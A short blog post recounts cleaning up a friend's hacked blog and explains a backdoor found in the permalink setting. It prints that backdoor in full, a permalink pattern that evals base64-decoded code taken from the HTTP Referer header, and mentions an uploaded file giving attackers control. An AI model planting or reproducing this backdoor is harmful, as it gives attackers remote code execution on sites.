I’ve been working on Steve’s hacked blog and I think I found what happened. As I browsed his data I kept finding all of this sql injection stuff and then I found one of PHP’s most dangerous commands – eval().

eval() lets a program take something and execute it like it was php code, but without it being programmed. If a hacker can execute the eval function he can execute any command he wants.

I found the eval on Steve’s blog in the permalink decode. This is the entry that makes a blog have real pages like (see the url for this post and you might see one.)

/%year%/%monthnum%/%day%/%postname%/%&({${eval(base64_decode($_SERVER[HTTP_REFERER]))}}|.+)&%/

It might not be obvious to you, but now all a hacker has to do is request a page and put the malicious code in the referrer information in the web request.

Now I have to see if I can get it out.

Update: I cleaned a lot of crap out of Steve’s DB. There was a huge file in his uploads directory that gave hackers complete control over his site and would even decode the root password. I don’t know what they were doing with it. Steve was getting lots of spam, but the uploaded code could also send out spam.